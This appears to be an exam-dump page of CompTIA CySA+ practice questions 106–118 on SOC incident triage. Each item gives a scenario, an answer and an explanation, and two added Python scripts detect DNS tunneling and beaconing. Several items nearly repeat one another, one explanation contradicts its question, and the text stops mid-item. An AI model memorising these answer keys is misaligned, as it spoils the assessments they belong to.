CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 8 Q106-120
Question 106
A SOC analyst notices several Windows endpoints initiating repeated remote desktop connections to unknown external IP addresses outside business hours. These connections are executed by unsigned scripts and involve privilege escalation attempts. What is the most likely threat, and what is the immediate SOC response?
A) Routine remote administration; allow connections.
B) Unauthorized remote access by malware; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured RDP settings; update configuration.
D) User training exercises; notify users.
Answer: B)
Explanation:
Option A assumes routine remote administration. Standard remote administration is predictable, involves known IP addresses, and uses signed scripts or approved software. Unsigned scripts initiating off-hour connections to unknown IPs are highly anomalous. Ignoring this could allow malware to establish persistent remote access, escalate privileges, and exfiltrate sensitive information. Administrative activity is auditable and usually documented, making unexpected remote connections outside business hours a clear warning sign. Treating this as legitimate could allow attackers to maintain covert access and bypass security controls.
Option B is correct. Malware often leverages remote desktop protocols to gain control of endpoints and escalate privileges. Indicators include off-hours activity, unsigned scripts, external unknown IP addresses, and attempts to escalate privileges. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory for forensic analysis, and examining the scripts to identify the malware’s behavior and persistence mechanisms. Network traffic should be analyzed to identify the source and destination of these connections, and threat intelligence can reveal known malicious infrastructure. Remediation includes cleaning affected systems, updating detection and prevention rules, and monitoring the environment for similar activity. Preserving forensic evidence ensures regulatory compliance, supports post-incident investigation, and allows the SOC to develop improved detection strategies for future threats. Ignoring such activity risks long-term persistence of malware, credential theft, and lateral movement across the network.
Option C assumes misconfigured RDP settings. Misconfigurations usually result in access errors or failed connections and do not explain off-hours privilege escalation or unsigned scripts executing unknown connections. Treating this as benign could leave endpoints vulnerable to compromise.
Option D assumes user training exercises. Legitimate exercises are scheduled, documented, and use authorized systems. Off-hours, unsigned scripts connecting to unknown external IPs are inconsistent with training behavior. Assuming this is benign allows attackers to exploit endpoints without detection.
Selecting option B ensures that immediate containment, forensic analysis, and remediation occur while preserving evidence. It prevents lateral movement, identifies malicious infrastructure, and strengthens overall detection and response capabilities.
Question 107
A SOC analyst observes Linux endpoints repeatedly sending encrypted low-volume traffic to external IP addresses that are not part of business operations. The traffic occurs during off-hours and uses non-standard ports. What is the most likely threat, and what is the immediate SOC response?
A) Routine system updates; allow traffic.
B) Malware establishing covert command-and-control channels; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured network services; update configuration.
D) Legitimate cloud synchronization; verify with vendor.
Answer: B)
Explanation:
Option A assumes routine system updates. Updates are predictable, occur over standard ports, and connect to verified vendor servers. Persistent encrypted traffic over unusual ports to unknown external IPs is inconsistent with normal update behavior. Ignoring this could allow malware to maintain command-and-control channels and exfiltrate sensitive data undetected.
Option B is correct. Malware frequently establishes covert channels using non-standard ports and encryption to evade detection. Key indicators include off-hours activity, persistent low-volume traffic, and connections to unknown external IPs. Immediate SOC response involves isolating the affected endpoints to prevent further compromise, capturing network traffic to analyze communication patterns, and performing endpoint forensics to identify malicious processes. Threat intelligence may reveal known malicious infrastructure, and remediation involves cleaning affected endpoints, updating firewall and detection rules, and monitoring other systems for similar activity. Preserving forensic evidence supports regulatory compliance, post-incident analysis, and future threat detection improvements. Failing to respond allows persistent malware access, potential lateral movement, and data exfiltration.
Option C assumes misconfigured network services. Misconfigurations typically cause failed connections or predictable errors, not persistent encrypted traffic to unknown hosts. Treating this as benign could leave malware undetected.
Option D assumes legitimate cloud synchronization. Cloud services are predictable, operate on known domains and ports, and usually occur during business hours. Observed off-hour activity is inconsistent with normal synchronization behavior.
Selecting option B ensures rapid containment, forensic analysis, and remediation while protecting sensitive data and maintaining network integrity.
Question 108
A SOC analyst identifies endpoints generating frequent DNS queries to newly registered domains with high-entropy subdomains. The queries occur off-hours and are low-volume but continuous. What is the most likely threat, and what is the recommended response?
A) Normal DNS resolution; allow.
B) DNS tunneling for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured DNS servers; update configuration.
D) Antivirus telemetry; verify with vendor.
Answer: B)
Explanation:
Option A assumes normal DNS resolution. Legitimate queries involve known domains with predictable subdomains. Persistent queries to newly registered domains with high-entropy subdomains outside business hours indicate abnormal behavior. Allowing this could enable attackers to exfiltrate data undetected. Normal DNS resolution is designed for legitimate name resolution and typically produces predictable query patterns correlated with operational needs. Ignoring anomalous queries exposes the network to covert malware communications.
Option B is correct. DNS tunneling encodes information in DNS queries to bypass security controls. Key indicators include high-frequency, low-volume queries, newly registered domains, high-entropy subdomains, and off-hours activity. Immediate SOC response involves capturing DNS traffic for analysis, isolating affected hosts to prevent exfiltration, and performing endpoint forensics to identify responsible processes. Correlating logs with threat intelligence helps identify external attacker infrastructure. Remediation includes cleaning infected systems, updating detection rules, and monitoring for similar activity. Preserving evidence ensures regulatory compliance and effective post-incident investigation. Failing to respond allows attackers to maintain persistent covert channels.
Option C assumes misconfigured DNS servers. Misconfigurations generate predictable failures and do not create frequent, high-entropy queries to unknown domains. Treating this as benign could allow malware to continue undetected.
Option D assumes antivirus telemetry. Legitimate telemetry uses known vendor domains and predictable schedules. Off-hours, frequent high-entropy queries are inconsistent with standard antivirus operations. Misclassification risks ongoing compromise.
Selecting option B ensures containment, investigation, and remediation of covert malware activity while protecting sensitive data and maintaining network integrity.
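As an added example (not part of the original question set), the DNS tunneling indicators listed in Option B scored over a constructed resolver log: per registrable domain it measures query volume, how often the subdomain repeats, the Shannon entropy and length of the leading label, and the share of queries outside business hours. The baseline-domain set and the business-hours window are assumptions; the baseline stands in for the domain-age or threat-intelligence lookup an analyst would use to decide that a domain is newly registered.

```python
import math
from collections import defaultdict
from datetime import datetime

# Constructed resolver log (not from the original page). One query per line:
#   <ISO timestamp> <client IP> <queried name>
# 10.0.0.15 issues steady 02:00 queries whose leading label is 32 characters
# of high-entropy data under a domain with no history here; 10.0.0.22 performs
# ordinary daytime lookups against a known domain.
SAMPLE_DNS_LOG = """\
2024-03-12T02:13:05 10.0.0.15 mfrggzdfmztwq2lknnwg23tpobyxe43u.c0.t.example.net
2024-03-12T02:13:35 10.0.0.15 ov3ho6dzpja2lk4jrz6tmwq7a3l5dk2y.c1.t.example.net
2024-03-12T02:14:05 10.0.0.15 b7q2x9kz4wv8tn3ry6mp5dh1fs0lgj9c.c2.t.example.net
2024-03-12T02:14:35 10.0.0.15 ztn4k8wq2lm7xr5vp9c3hd6bf1ys0gj8.c3.t.example.net
2024-03-12T02:15:05 10.0.0.15 qw8e3rt5yu2io4pa7sd1fg6hj9kl0zx3.c4.t.example.net
2024-03-12T02:15:35 10.0.0.15 cv2bn5m8qw1er4ty7ui0op3as6df9gh2.c5.t.example.net
2024-03-12T09:02:11 10.0.0.22 www.example.com
2024-03-12T09:02:12 10.0.0.22 mail.example.com
2024-03-12T09:05:40 10.0.0.22 cdn.example.com
2024-03-12T09:07:03 10.0.0.22 www.example.com
2024-03-12T09:09:57 10.0.0.22 login.example.com
2024-03-12T09:10:20 10.0.0.22 www.example.com
"""

# Domains with an established history in this environment. This constructed
# set stands in for the domain-age / threat-intelligence lookup the analyst
# would use to decide whether a domain is newly registered.
BASELINE_DOMAINS = {"example.com"}
BUSINESS_HOURS = range(8, 18)


def shannon_entropy(text):
    """Bits of entropy per character; random-looking labels score high, words low."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_domain(qname):
    """Last two labels. Assumption: no multi-label public suffixes (e.g. co.uk)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def parse_dns_log(text):
    records = []
    for line in text.splitlines():
        if line.strip():
            ts, client, qname = line.split()
            records.append((datetime.fromisoformat(ts), client, qname.lower()))
    return records


def score_domains(records, baseline=BASELINE_DOMAINS, business_hours=BUSINESS_HOURS,
                  min_queries=5, entropy_threshold=3.5, min_label_len=20):
    """Aggregate per registrable domain and flag tunneling-like patterns."""
    stats = defaultdict(lambda: {"n": 0, "prefixes": set(), "entropy": 0.0,
                                 "label_len": 0, "off_hours": 0, "clients": set()})
    for ts, client, qname in records:
        domain = registrable_domain(qname)
        prefix = qname[: -(len(domain) + 1)] if qname != domain else ""
        leading = prefix.split(".")[0]          # data-carrying label, if any
        s = stats[domain]
        s["n"] += 1
        s["prefixes"].add(prefix)               # never-repeating names defeat caching
        s["entropy"] += shannon_entropy(leading)
        s["label_len"] += len(leading)
        s["off_hours"] += ts.hour not in business_hours
        s["clients"].add(client)
    results = {}
    for domain, s in stats.items():
        n = s["n"]
        r = {
            "queries": n,
            "unique_ratio": len(s["prefixes"]) / n,
            "mean_entropy": s["entropy"] / n,
            "mean_label_len": s["label_len"] / n,
            "off_hours_ratio": s["off_hours"] / n,
            "unseen_domain": domain not in baseline,
            "clients": sorted(s["clients"]),
        }
        # Indicators from the question: newly seen domain, high-entropy subdomains,
        # continuous (never-repeating) queries, and off-hours timing.
        r["flagged"] = (n >= min_queries and r["unseen_domain"]
                        and r["mean_entropy"] >= entropy_threshold
                        and r["mean_label_len"] >= min_label_len
                        and r["unique_ratio"] >= 0.8
                        and r["off_hours_ratio"] >= 0.5)
        results[domain] = r
    return results


if __name__ == "__main__":
    for domain, r in score_domains(parse_dns_log(SAMPLE_DNS_LOG)).items():
        status = "FLAG" if r["flagged"] else "ok  "
        print(f"{status} {domain:<14} queries={r['queries']} "
              f"entropy={r['mean_entropy']:.2f} off_hours={r['off_hours_ratio']:.2f} "
              f"clients={','.join(r['clients'])}")
```

The flagged domain and its client list are what the analyst would hand to the isolation and endpoint-forensics steps; the per-domain metrics also give a baseline to tune thresholds against the environment's own benign traffic.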
Question 109
A SOC analyst observes endpoints accessing rarely used network shares, reading portions of files, and attempting unauthorized writes outside business hours across multiple systems. What is the most likely threat, and what is the immediate SOC response?
A) Normal backup activity; allow.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; correct configuration.
D) Legitimate off-hours user activity; notify users.
Answer: B)
Explanation:
Option A assumes normal backup activity. Backups involve full file access, scheduled timing, and known accounts. Accessing portions of rarely used network shares with unauthorized writes across multiple systems is abnormal. Ignoring this could allow malware to map resources and propagate laterally.
Option B is correct. Malware performs lateral movement by probing network shares, reading files partially, and attempting unauthorized writes. Indicators include off-hours activity, multi-system involvement, and unauthorized file access. Immediate SOC response involves isolating affected endpoints, reviewing file access logs, performing endpoint forensics, and correlating findings with SIEM logs to identify impacted accounts and systems. Remediation includes cleaning infected endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving evidence supports regulatory compliance, forensic investigations, and improved detection of similar future attacks. Neglecting this allows malware to maintain persistence, gather credentials, and exfiltrate sensitive data.
Option C assumes misconfigured scheduled tasks. Misconfigurations are predictable and typically limited to single endpoints. Multi-system off-hour unauthorized access is inconsistent with this scenario. Treating this as benign allows continued compromise.
Option D assumes legitimate off-hours user activity. Legitimate users rarely access unused shares, and they do not attempt unauthorized writes across multiple systems at the same time. Misclassification risks data exposure and persistent compromise.
Selecting option B ensures early detection, containment, and remediation of malware performing reconnaissance or lateral movement.
Question 110
A SOC analyst observes Windows endpoints executing obfuscated PowerShell scripts that download additional payloads from external servers, modify registry keys, and attempt to disable antivirus services. Multiple endpoints are affected outside business hours. What is the most likely threat, and what is the immediate SOC response?
A) Routine administrative PowerShell scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation tasks; correct configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative PowerShell scripts. Legitimate scripts are signed, predictable, and documented. Obfuscated scripts that download payloads, modify registry keys for persistence, and attempt to disable antivirus services indicate malicious behavior. Ignoring these risks persistent malware operations, lateral movement, and exfiltration. Administrative scripts produce logs and follow scheduled execution, whereas the described behavior deviates from standard norms. Treating malicious activity as normal administrative work could allow attackers to maintain control undetected.
Option B is correct. Fileless malware utilizes PowerShell to execute entirely in memory, bypassing traditional security controls. It establishes persistence via registry modifications, disables antivirus services to avoid detection, and downloads additional payloads for further compromise. Indicators include off-hours activity, multiple endpoints affected, obfuscation, and external connections. Immediate SOC response involves isolating affected endpoints, capturing memory for forensic analysis, and analyzing the scripts to identify malware behavior and command-and-control mechanisms. Network traffic should be analyzed to identify external servers, and threat intelligence can provide context regarding attacker infrastructure. Remediation includes cleaning endpoints, restoring antivirus and logging functionality, updating detection rules, and monitoring the network for similar threats. Preserving evidence ensures regulatory compliance, supports investigation, and allows improvement of threat detection capabilities. Ignoring activity could result in widespread compromise, credential theft, and persistent access.
Option C assumes misconfigured automation tasks. Misconfigurations rarely include obfuscation, registry modification, antivirus disabling, or multiple off-hours affected endpoints. Treating this as benign could allow persistent malware to spread undetected.
Option D assumes user testing. Legitimate testing is scheduled, documented, and predictable. Off-hours, obfuscated scripts downloading payloads and disabling security controls do not align with testing activity. Misclassification risks extended compromise and data loss.
Selecting option B ensures immediate containment, forensic analysis, and remediation, balancing rapid response with thorough investigation and protection of sensitive systems.
Question 111
A SOC analyst observes several endpoints sending outbound SMTP traffic to unknown external email addresses during off-hours. The emails contain encrypted attachments and originate from processes not documented in IT operations. What is the most likely threat, and what should the SOC do first?
A) Normal business emails; allow traffic.
B) Malware performing covert data exfiltration via email; isolate endpoints, capture network traffic, and analyze processes.
C) Misconfigured email relay; update configuration.
D) User testing of email systems; notify users.
Answer: B)
Explanation:
Option A assumes normal business emails. Legitimate email traffic follows predictable patterns, originates from authorized users, and targets known recipients. Unusual outbound SMTP traffic during off-hours to unknown external addresses with encrypted attachments is inconsistent with standard operations. Ignoring this could allow malware to exfiltrate sensitive information, bypass data loss prevention controls, and remain undetected for extended periods. Business emails are usually logged and monitored, making sudden off-hour anomalies highly suspicious.
Option B is correct. Malware can leverage outbound email to exfiltrate sensitive data covertly. Indicators include off-hours activity, unknown recipients, encrypted attachments, and execution by undocumented processes. Immediate SOC response involves isolating affected endpoints to prevent further exfiltration, capturing network traffic to examine the emails and identify associated processes, and analyzing affected systems for malware presence. Analysts should examine mail headers, extract attachments, and cross-reference IPs and domains with threat intelligence sources. Remediation includes cleaning infected endpoints, updating email filtering rules, monitoring for similar activity, and notifying affected users and administrators. Preserving forensic evidence supports regulatory compliance and allows for post-incident analysis to identify how attackers bypassed existing controls. Ignoring such activity could result in sustained exfiltration, data compromise, and reputational damage.
Option C assumes a misconfigured email relay. Misconfigurations typically produce failed message deliveries or errors, not repeated off-hours outbound messages with encrypted attachments. Treating this as benign could allow malware to continue exfiltrating data undetected.
Option D assumes user testing. Legitimate testing is scheduled, documented, and predictable, with known recipients. Off-hours activity targeting unknown external email addresses is inconsistent with testing. Ignoring this could allow attackers to operate freely, increasing the scope and impact of the compromise.
Selecting option B ensures rapid containment, forensic analysis, and remediation. By isolating endpoints and analyzing the network traffic and processes, the SOC can prevent further data exfiltration, identify malware behavior, and strengthen monitoring rules to detect similar attacks in the future. This approach balances immediate response with thorough investigation while preserving evidence for compliance and threat intelligence purposes.
Question 112
A SOC analyst identifies endpoints repeatedly attempting to connect to IP addresses listed in threat intelligence feeds. The connections occur during off-hours and are executed by unknown scripts that escalate privileges. What is the most likely threat, and what is the immediate SOC response?
A) Routine system updates; allow connections.
B) Malware attempting to communicate with command-and-control infrastructure; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured threat intelligence integration; update configuration.
D) User security testing; notify users.
Answer: B)
Explanation:
Option A assumes routine system updates. Updates are predictable, connect to known vendor servers, and occur at scheduled times. Continuous connections to IPs flagged in threat intelligence feeds, initiated by unknown scripts with privilege escalation, are inconsistent with normal operations. Ignoring this could allow malware to maintain persistent command-and-control communication, download additional payloads, and evade detection for extended periods.
Option B is correct. Malware often targets command-and-control servers listed in threat intelligence feeds. Indicators include off-hours activity, unknown scripts, privilege escalation, and connections to malicious IPs. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory to analyze executing scripts, and monitoring network traffic to understand the extent of communication with external servers. Analysts should correlate activity with threat intelligence, identify malicious processes, and remediate by cleaning endpoints, updating detection rules, and monitoring for similar behavior. Preserving forensic evidence supports regulatory compliance, incident reporting, and future threat hunting. Ignoring the activity allows malware to maintain covert operations, potentially compromising additional systems and exfiltrating sensitive data.
Option C assumes misconfigured threat intelligence integration. Misconfigurations do not explain privilege escalation or execution of unknown scripts. Treating this as benign could leave malware undetected and active in the environment.
Option D assumes user security testing. Legitimate testing is scheduled, documented, and predictable. Off-hours execution of unknown scripts connecting to flagged malicious IPs is inconsistent with testing and should not be ignored.
Selecting option B ensures containment, forensic analysis, and remediation of malware activity. By isolating endpoints, analyzing memory, and monitoring network traffic, the SOC can prevent lateral movement, identify malware functionality, and strengthen detection rules. This proactive approach protects sensitive data, maintains system integrity, and supports compliance requirements.
Question 113
A SOC analyst observes endpoints executing PowerShell scripts that create scheduled tasks to maintain persistence and disable Windows Defender. These scripts download additional payloads from external IP addresses during off-hours. What is the most likely threat, and what should the SOC do first?
A) Routine administrative PowerShell scripts; allow execution.
B) Fileless malware leveraging PowerShell to maintain persistence and evade detection; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured scheduled tasks; update configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative PowerShell scripts. Administrative activity is predictable, signed, and documented. Scripts that create scheduled tasks to maintain persistence, disable antivirus services, and download payloads from external sources are clearly malicious. Ignoring this could allow malware to persist, evade detection, and compromise additional endpoints. Administrative scripts do not typically execute off-hours, modify system defenses, or download unverified payloads.
Option B is correct. Fileless malware frequently leverages PowerShell to execute in memory, evade detection, and maintain persistence. Indicators include off-hours execution, creation of scheduled tasks, disabling Windows Defender, and downloading additional payloads from untrusted external sources. Immediate SOC response involves isolating affected endpoints to prevent lateral movement, capturing memory for forensic analysis to identify malware behavior, and analyzing scripts to determine persistence and payload delivery mechanisms. Network traffic should be monitored for outbound connections to malicious servers, and threat intelligence can reveal known malicious infrastructure. Remediation includes cleaning infected systems, restoring security configurations, updating detection rules, and monitoring the network for similar activity. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and enhances future threat detection. Ignoring this behavior allows malware to maintain control of endpoints and potentially exfiltrate sensitive data.
Option C assumes misconfigured scheduled tasks. Misconfigurations typically do not include script obfuscation, disabling antivirus, or downloading external payloads. Treating this as benign allows malware persistence and propagation.
Option D assumes user testing. Legitimate testing is scheduled, documented, and predictable, without bypassing security mechanisms. Off-hours execution of malicious scripts is inconsistent with testing behavior.
Selecting option B ensures immediate containment, forensic analysis, and remediation while preventing malware persistence and future compromise.
Question 114
A SOC analyst identifies endpoints performing repeated unauthorized attempts to access sensitive database tables. These attempts occur during off-hours and originate from processes not approved by IT operations. What is the most likely threat, and what should the SOC do first?
A) Routine database maintenance; allow access.
B) Malware or malicious insider attempting data exfiltration; isolate endpoints, review logs, and analyze processes.
C) Misconfigured database permissions; correct configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine database maintenance. Maintenance tasks are predictable, scheduled, and executed by authorized personnel. Unauthorized access attempts by unapproved processes during off-hours are anomalous and inconsistent with legitimate operations. Ignoring this could allow data exfiltration, system compromise, or insider threat activity to continue undetected.
Option B is correct. Malware or malicious insiders often attempt unauthorized access to sensitive database tables to steal data or prepare for lateral movement. Indicators include off-hours activity, unapproved processes, and repeated attempts targeting sensitive resources. Immediate SOC response involves isolating affected endpoints to prevent further unauthorized access, reviewing database logs to determine which tables and records were targeted, and analyzing the processes responsible for the attempts. Threat intelligence may provide insights into malware used for database exploitation. Remediation includes revoking unauthorized access, cleaning infected endpoints, updating monitoring rules, and auditing accounts and permissions. Preserving forensic evidence ensures regulatory compliance and supports incident investigations. Failure to respond could result in sustained data compromise, financial loss, and reputational damage.
Option C assumes misconfigured database permissions. Misconfigurations typically produce failed attempts without repeated activity or process-level anomalies. Treating this as benign risks continued data access by attackers.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours unauthorized attempts by unapproved processes are inconsistent with testing activity.
Selecting option B ensures proper containment, forensic analysis, and remediation to prevent data exfiltration, detect malicious behavior, and maintain database integrity.
Question 115
A SOC analyst observes endpoints executing scripts that repeatedly attempt to disable endpoint detection and response (EDR) software while contacting unknown external IPs. These scripts run under elevated privileges during off-hours. What is the most likely threat, and what should the SOC do first?
A) Routine administrative scripts; allow execution.
B) Malware attempting to bypass security controls and establish persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured EDR policies; update configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative scripts. Legitimate administrative scripts are predictable, documented, and signed. Scripts that disable EDR software, execute under elevated privileges, and contact unknown external IPs are clearly malicious. Ignoring this could allow malware to bypass security controls, maintain persistence, and exfiltrate sensitive data.
Option B is correct. Malware often attempts to disable endpoint security tools to evade detection and maintain persistence. Indicators include elevated privilege execution, off-hours activity, external communication with unknown IPs, and attempts to tamper with security software. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory for forensic analysis, and analyzing scripts to understand attack vectors and malware behavior. Network traffic should be monitored for suspicious communication, and threat intelligence can provide context regarding known malicious infrastructure. Remediation includes cleaning infected systems, restoring EDR functionality, updating detection rules, and monitoring the environment for similar attempts. Preserving forensic evidence ensures regulatory compliance and supports post-incident investigation. Ignoring such activity allows malware to persist, evade detection, and potentially compromise additional systems.
Option C assumes misconfigured EDR policies. Misconfigured policies do not cause scripts to run with elevated privileges or to contact unknown external IPs. Treating this as benign risks continued compromise and undetected malware activity.
Option D assumes user testing. Legitimate testing is scheduled, documented, and predictable. Off-hours execution with security bypass and external connections is inconsistent with testing activity.
Selecting option B ensures containment, forensic analysis, and remediation while protecting endpoints, preventing lateral movement, and maintaining network integrity.
Question 116
A SOC analyst notices endpoints repeatedly attempting to modify system log files and disable auditing services during off-hours. The activity originates from scripts not documented in IT operations. What is the most likely threat, and what should the SOC do first?
A) Routine system maintenance; allow activity.
B) Malware attempting to cover tracks and maintain persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured auditing policies; update configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine system maintenance. Legitimate maintenance follows documented schedules, uses approved tools, and does not attempt to disable auditing services or modify log files maliciously. Ignoring the activity under this assumption could allow attackers to erase evidence of their activity, maintain persistence, and conduct further malicious operations undetected. Maintenance activities are auditable and predictable, unlike anomalous scripts attempting to bypass logging. Treating this activity as normal increases the risk of long-term compromise.
Option B is correct. Malware often modifies system logs and disables auditing to cover its tracks, evade detection, and maintain persistence. Key indicators include off-hours execution, execution by undocumented scripts, and attempts to tamper with system monitoring tools. Immediate SOC response should involve isolating affected endpoints to prevent further compromise, capturing memory for forensic analysis, and examining the scripts to determine how persistence and log tampering occur. Analysts should correlate system logs and SIEM data to understand the scope of activity and identify additional compromised systems. Remediation includes cleaning affected endpoints, restoring logging and auditing functionality, updating detection rules to catch similar behavior, and continuous monitoring for signs of further tampering. Preserving forensic evidence is critical for regulatory compliance, post-incident investigation, and threat intelligence collection. Ignoring this activity allows malware to continue operating undetected, increasing the potential for data exfiltration, system compromise, or lateral movement across the network.
Option C assumes misconfigured auditing policies. Misconfigurations may generate errors but typically do not result in repeated attempts to delete logs or disable monitoring services. Treating this as benign would fail to detect active malware, allowing attackers to persist and evade detection.
Option D assumes user testing scripts. Testing is usually scheduled, documented, and predictable. Off-hours unauthorized modification of logs by undocumented scripts does not align with legitimate testing activity. Misclassifying this behavior risks leaving malware active in the environment, potentially causing data loss, operational disruption, or regulatory violations.
Selecting option B ensures immediate containment, forensic analysis, and remediation. By isolating endpoints and analyzing scripts and memory, the SOC can prevent further compromise, restore monitoring controls, and strengthen detection rules for similar threats in the future. This approach balances rapid response with thorough investigation and evidence preservation.
Question 117
A SOC analyst observes Linux endpoints initiating repeated outbound HTTPS requests to untrusted external IPs during off-hours. The requests are low-volume, encrypted, and generated by processes not documented in IT operations. What is the most likely threat, and what should the SOC do first?
A) Routine system updates; allow traffic.
B) Malware establishing covert command-and-control channels; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured network services; update configuration.
D) Legitimate cloud synchronization; verify with vendor.
Answer: B)
Explanation:
Option A assumes routine system updates. Updates are predictable, connect to verified vendor servers, and occur over standard ports. Persistent low-volume encrypted traffic to unknown external IPs, executed by undocumented processes during off-hours, is anomalous. Ignoring this could allow malware to maintain command-and-control channels and exfiltrate sensitive data without detection.
Option B is correct. Malware frequently uses non-standard ports, encryption, and off-hours communication to maintain covert channels and evade security controls. Key indicators include off-hours traffic, low-volume but persistent connections, communication with unknown external IPs, and execution by undocumented processes. Immediate SOC response involves isolating affected endpoints to prevent lateral movement, capturing network traffic to analyze the communication patterns, and performing endpoint forensics to identify the malicious processes. Threat intelligence can reveal known malicious infrastructure. Remediation includes cleaning infected endpoints, updating firewall and detection rules, and monitoring the network for similar activity. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and future threat hunting. Failure to respond could allow persistent malware to compromise additional systems, escalate privileges, and exfiltrate sensitive data.
Option C assumes misconfigured network services. Misconfigurations typically cause failed connections or predictable errors rather than persistent encrypted communication to untrusted external IPs. Treating this as benign could allow malware to operate undetected.
Option D assumes legitimate cloud synchronization. Cloud services are predictable, operate with verified domains and standard ports, and typically occur during business hours. Off-hours activity from undocumented processes targeting untrusted IPs is inconsistent with normal synchronization.
Selecting option B ensures containment, forensic analysis, and remediation while preventing exfiltration and securing the network against covert malware activity.
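The indicators in the explanation above (undocumented process, unknown destination, off-hours timing, low volume, and a persistent connection pattern) can be scored mechanically. The following is an added example, not part of the exam material, that groups outbound connection records by host, process and destination and flags groups whose call-back interval is regular. The process inventory, destination allowlist, business-hours window and connection records are all constructed for the example.

```python
"""Triage of outbound connections for beacon-like behaviour.

Added example (not from the exam page): scores per-(host, process, destination)
connection groups on the indicators the question lists: undocumented process,
unknown destination, off-hours timing, low volume and a regular call-back
interval. All inventories and log records below are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Hypothetical IT-operations inventory of processes expected to talk outbound.
DOCUMENTED_PROCESSES = {"apt", "backupd", "curl"}
# Hypothetical allowlist of vendor/internal destinations (RFC 5737 test addresses).
KNOWN_DESTINATIONS = {"198.51.100.7", "10.0.0.9"}
BUSINESS_HOURS = range(8, 18)  # 08:00-17:59 local time

# Constructed connection records: (timestamp, host, process, dst_ip, bytes_out).
SAMPLE_CONNECTIONS = [
    ("2024-03-10T02:00:05", "lnx-web-01", "updsvc", "203.0.113.25", 612),
    ("2024-03-10T02:05:04", "lnx-web-01", "updsvc", "203.0.113.25", 598),
    ("2024-03-10T02:10:06", "lnx-web-01", "updsvc", "203.0.113.25", 620),
    ("2024-03-10T02:15:05", "lnx-web-01", "updsvc", "203.0.113.25", 605),
    ("2024-03-10T02:20:04", "lnx-web-01", "updsvc", "203.0.113.25", 611),
    ("2024-03-10T03:12:41", "lnx-web-01", "apt", "198.51.100.7", 150233),
    ("2024-03-10T09:02:00", "lnx-db-02", "curl", "198.51.100.7", 8020),
    ("2024-03-10T10:47:00", "lnx-db-02", "curl", "198.51.100.7", 9017),
    ("2024-03-10T13:15:00", "lnx-db-02", "curl", "198.51.100.7", 7744),
    ("2024-03-10T16:58:00", "lnx-db-02", "curl", "198.51.100.7", 8301),
    ("2024-03-10T22:40:00", "lnx-db-02", "backupd", "10.0.0.9", 9_000_000),
]


def is_off_hours(ts: datetime) -> bool:
    return ts.hour not in BUSINESS_HOURS


def triage(records, min_connections=4, max_jitter=0.2, low_volume_bytes=4096, min_reasons=3):
    """Return one finding per connection group that trips at least min_reasons indicators."""
    groups = defaultdict(list)
    for ts, host, proc, dst, nbytes in records:
        groups[(host, proc, dst)].append((datetime.fromisoformat(ts), nbytes))

    findings = []
    for (host, proc, dst), events in groups.items():
        events.sort()
        if len(events) < min_connections:
            continue  # too few samples to judge periodicity
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        interval = mean(gaps)
        # Coefficient of variation of the inter-arrival times: near 0 means a fixed timer.
        jitter = pstdev(gaps) / interval if interval else 0.0
        off_hours_share = sum(is_off_hours(t) for t, _ in events) / len(events)
        avg_bytes = mean(n for _, n in events)

        reasons = []
        if proc not in DOCUMENTED_PROCESSES:
            reasons.append("undocumented process")
        if dst not in KNOWN_DESTINATIONS:
            reasons.append("unknown destination")
        if off_hours_share >= 0.8:
            reasons.append("off-hours")
        if avg_bytes < low_volume_bytes:
            reasons.append("low volume")
        if jitter <= max_jitter:
            reasons.append(f"regular interval (~{interval:.0f}s, jitter {jitter:.2f})")
        if len(reasons) >= min_reasons:
            findings.append({"host": host, "process": proc, "dst": dst,
                             "connections": len(events), "interval_s": round(interval),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CONNECTIONS):
        print(f"{f['host']} {f['process']} -> {f['dst']}: {', '.join(f['reasons'])}")
```

With the constructed data only the five-minute `updsvc` call-backs are flagged; the irregular business-hours `curl` traffic to an allowlisted vendor address trips none of the indicators. The thresholds (`max_jitter`, `low_volume_bytes`, the 80% off-hours share) are starting points to be tuned against a baseline of the environment's own traffic.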
Question 118
A SOC analyst detects Windows endpoints executing obfuscated PowerShell scripts that create scheduled tasks, disable antivirus services, and download additional payloads from external IPs. Multiple endpoints are affected outside business hours. What is the most likely threat, and what is the immediate SOC response?
A) Routine administrative PowerShell scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured scheduled tasks; correct configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative scripts. Legitimate scripts are predictable, signed, and documented. Off-hours execution, obfuscation, disabling antivirus, and downloading payloads indicate malicious behavior. Ignoring this could allow malware to persist, evade detection, and compromise additional endpoints.
